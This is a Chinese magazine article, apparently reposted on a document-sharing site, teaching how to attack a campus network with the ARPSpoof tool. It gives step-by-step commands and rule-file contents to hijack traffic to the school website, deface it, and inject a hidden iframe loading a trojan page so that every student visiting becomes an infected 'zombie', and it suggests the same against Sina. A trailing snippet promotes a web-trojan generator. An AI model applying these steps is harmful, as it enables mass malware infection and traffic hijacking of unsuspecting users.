校园网大攻击 ARPSpoof迷魂阵

来源 :网友世界 | 被引量 : 0次 | 上传用户:competent110
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  在校园网中,有无数同学的宿舍电脑都在其中,同学们平时有事没事。都上学校的网站和论坛,在里面吹牛发牢骚。不过谁都没想到一夜之间,所有的电脑都将成为了一次入侵攻击的目标。看看我们用一个叫作ARPspoof的工具,想黑就黑,黑掉学校网站,控制校园网中所有同学的电脑,在他们的电脑中种上木马,几分钟控制上百台电脑……
  
  ARPSpoof为什么这么厉害
  
  相信许多读者都或多或少听说过局域网内的ARP欺骗攻击吧,ARP攻击类似于一种电脑“催眠”技术,可以点对点的欺骗某台电脑,改变它所要连接传输数据的目的地。也就是说,ARP欺骗是在局域网中,点对点的发生在两台电脑之间的。
  但是以ARPspoof工具为代表的新兴的ARP攻击技术发生了变化,直接针对网关进行欺骗,让通过网关访问网络的电脑全被欺骗攻击,造成网站被入侵的假象,或者直接访问到木马网页。——也就是说,点对点的攻击技术,发展为了点对多攻击模式。而且新兴的ARP欺骗技术,不仅可在局域网中施用,而且被广泛的因应于Internet网上,攻击目标范围更加的广!
  
  一分钟,“黑掉”校园网站
  
  利用ARP欺骗攻击,我们可以短短的几分钟之内,入侵内部校园网站!
  步骤一:查询网络环境
  首先,必须确认是处于校园网局域网中,需要确定校园网网关的IP地址,与要攻击的校园内部网站的IP地址。
  在命令提示符窗口下执行命令:“ipconfig”,即可查看到本机网络信息,其中“Default Gateway”对应的“192.168.1.1”就是校园网网关地址。而我们要攻击的目标校园网站或论坛的lP地址。可通过Ping获得,这里查知为“192.168.1.8”。
  步骤二:安装WinPcap包
  要进行ARP欺骗。首先要安装WinPcap驱动包。下载运行最新的“WinPcap v4.0 Beta 3”程序,直接双击运行即可完成安装。安装成功后,打开“网上邻居”→“查看网络连接”,右键点击“本地连接”,选择“属性”命令,打开本地连接属性对话框。在中间的网络协议列表中看见“Network MonitorDriver”,则说明安装成功。
  步骤三:生成定义规则
  下载专用的ARP欺骗工具“arpspoof3.lb”,解压后在命令提示符窗口中进入程序所在的文件夹,执行命令:
  arpspoof.exe/n
  命令执行成功后,会在当前文件夹下生成一个名为“job.txt“的文件,此文件是用于定义欺骗规则的。
  步骤四:修改规则
  用记事本打开“job.txt”文件,可自定义欺骗规则。在文件中可看到如图5所示内容。该规则表示,将捕获到的网络数据包中的“  在命令行下执行命令:arpspoof.exe/。将会显示当前的网络配置信息,包括网卡的数目和网关与本机的lP地址。这里本机有3块网卡,选择要用于欺骗攻击的网卡为“0.RealtekRTL8139”,因此网卡号为0。如果只有一块网卡的话,网卡的序号直接为O。继续执行命令:
  arpspoof.exe.192.168.1.8 192.168.1.100/rjob.txt
  命令执行后,即可截获并替换掉从校园网站(192.168.1.8)发向网关(192.168.1.1)的数据。由于校园网内所有同学访问校园网站时,都必须通过网关转发数据,因此我们在进行ARP数据欺骗攻击后,其他同学访问到的实际上是我们设置的数据。具体效果将会体现在其他同学访问校园网站时,打开的网页不是真实的网页,而是被“黑”页面。
  
  利用校园网,远程控制所有电脑
  
  其实真正的校园网站根本没有被黑,即使网站管理员进行检查,也找不出什么毛病。刚才同学们访问到的校园网站被黑。只是一个ARP欺骗的假象,也就是说,我们用假的网页替换了真的网站网页。如果我们用一个上面种植有木马的网页,进行欺骗替换,那么所有的同学在访问校园网站时,都会中网页木马!而且这种挂马方式非常有优势,由于真实的网页文件中根本没有被写入代码,因此网站管理员无法检查,也不可能阻止网站被挂马!
  步骤一:制作同页木马
  制作网页木马的具体过程就不多介绍了,值得一提的是,以前有许多朋友抱怨没有空间放网页木马,这里就不必担心了,因为可以直接在局域网内通过IIS建站,在本地主机上放置木马网页。这里假设木马网页地址为:“http://192.168.5.8/muma.htm”。
  步骤二:修改规则文件进行欺骗
  将前面生成的“job.txt”文件,内容修改如下:
  ------
  
  (iframe src=http://192.168.5.8/muma.htm width=0height=0>)
  保存文件后,用上面同样的方法进行ARP欺骗。
  步骤三:坐收肉鸡
  只要有人访问校园网站,不会显示任何异常,打开的仍然是正常的校园网站网页。但事实上。打开的网页中已被嵌入了网页木马。而且无论是访问网站上的任何一个文件,甚至是显示为404错误不存在的网页,也会中木马!——就等着收肉鸡吧!
  ARPSpoof欺骗攻击的应用环境非常广,首先是普通的公司企业或网吧之类的局域网中,无论是采用HUB集线器、路由器,还是采用交换机组建的局域网都适用;其次是小区之类的Internet网络中,有许多小区内采用的是静态分配lP地址的方式上网,有公共的网关IP地址,这类处于同一网段内的公网网络也会遭受攻击。此外,在普通的lnternet中也能应用ARP欺骗攻击。例如我们要攻击“新浪”网,只需要入侵与新浪网在同一网段的某台主机,然后运行ARPSpoof,就可达到在新浪网上挂马的目的,可见ARPSpoof的危害是如此的大!而普通用户对此根本无能为力,只有依靠网管在网关上安装ARP防火墙才可以防止此类攻击!
  下载地址:
  http://blog.sina.com.cn/u/42ccdOe30100086c
其他文献
MM的QQ秀过期了,吵嚷着要换QQ秀。打开QQ秀主页后,虽然可以在“搜索QQ秀”里输入关键字查找,但是以前的搜索功能还可以根据性别、类型、价格条件搜索QQ秀。想找回这个搜索工具条,只需在浏览器地址栏输入“http://qqshow.qq.com/search/”,回车就可以使用这个旧的搜索工具条了。
期刊
Gtalk(Google Talk)有段时间没使用了,这段时间,笔者得知Gtalk网页版已经开通了群聊功能,好奇地体验了一下,使用过程中还发现了一些技巧,在此和大家一起分享。  第一步:在IE里打开“http://talkgadget.google.com/talkgadget/popout”,登录自己的Gtalk帐号,进入Gtalk网页版页面。  第二步:在好友列表里单击任意一个在线网友,在打开
期刊
在QQ好友列表里,当鼠标移到好友昵称时,会弹出浮动窗口提示一些信息。其中底下一行会显示一些已开通的业务小图标。现在,我们也可以轻松点亮QQ邮箱的图标。  登录QQ邮箱后,点击顶端的“设置”链接,在跳转的“邮箱设置”页面里勾选“在QQ中点亮邮箱图标”复选框,单击“保存更改”按钮完成操作。以后,只要好友使用的是0Q2007 Beta3及以上版本,就可以在自己的浮动窗口里看到有“QQ邮箱”的小图标。
期刊
看了今年12期的《生活“百度”通》介绍的生活搜索(http://www.baidu.com/life/),页面提供的20多种生活搜索服务可以让新手快速找到对应的信息。笔者忽然想起Google也提供了这方面的服务,与百度不同的是,Google是直接在自家搜索基础上加以改进,而不是做做表面上的“搜索导航”。  在IE里打开页面http://www.google.cn/shenghuo/,这里我们可以进
期刊
大家一定对snagIt有所耳闻,它是一款老牌的截图和图像处理软件。不过作为一款共享软件,你需要有注册码才能解除snagIt的一些限制。虽然snagIt破解版网上多得是。但是我们也可以通过下面的正规渠道获取它。  第一步:打开JE,在地址栏中输入“http://tinyurl.com/2wpg8v”原地址:http://www.techsmith.com/snagit/ukdn.asp),这个页面的
期刊
大家一定经常会收到QQ好友发来的一些推荐网站的信息,在QQ里直接点击网址可以调用关联的浏览器打开网站。这时,如果想用其它第三方浏览器打开这个网站,可以先在复制聊天记录的网址信息,然后在浏览器里打开该网站。可以看出,这种方法比较笨拙,那么看看有什么更省力的办法。  在QQ聊天窗口里选中网址内容,然后拖曳到Maxthon、GreenBrowser等第三方浏览器窗口里,浏览器很快就打开这个网站。不过要注
期刊
相信很多朋友都已经申请到了Foxmail的在线邮箱,可登录Foxmail邮箱后,“通讯录”是空空如也,难道一一重新添加?这办法当然不可行,我们只要开动脑筋,就能快速让Foxmail邮箱“共享”Foxmail客户端程序的地址簿。  第一步:在Foxmail客户端主窗口点击菜单“工具”→“地址簿”,打开地址簿窗口。选中需要导出的联系人组,点击菜单“工具”→“导出”→“CSV文件(*.csv)”,并按照
期刊
为了方便MySpace用户相互交流,MySpace终于推出了自己的即时通信工具:MySpacelM(下载地址:http://imupdate.MySpace.cn/nsis/MySpacelM_Setup.exe)。通过它,用户可以轻松地实现与社区朋友聊天、收发站内消息、访问MySpace和听好友上传的音乐等功能。鉴于以前曾有报道说,该工具推出的目的,完全是为了与MSN、QQ两大IM霸主一争雌雄,
期刊
使用RSS订阅软件来订阅新闻、博客虽然方便,但也有弊端。那就是你必须打开RSS订阅软件才能阅读新闻或博客。这样,一些时效性很强的新闻,你就不能在第一时间阅读。如果你使用MsN、Gtalk或skype聊天工具,只要添加了“哪吒”机器人,就可以在第一时间快速阅读你订阅的信息。这里,笔者以MsN为例介绍。  第一步:打开MsN,添加:msnl007@anothr.com为MSN好友,添加“哪吒”订阅机器
期刊
借迅雷之手传播木马    软件名称:Web迅雷1.8.4.130网马生成器  软件大小:224 KB  下载地址:http://freesoft.heckbase.net/download/  20070627thunder.rar?weidun=43927of11a62de7c919168  be5e54b826co8a2f  杀伤指数:★★★★★  这是利用web迅雷1.8.4.130版本的最
期刊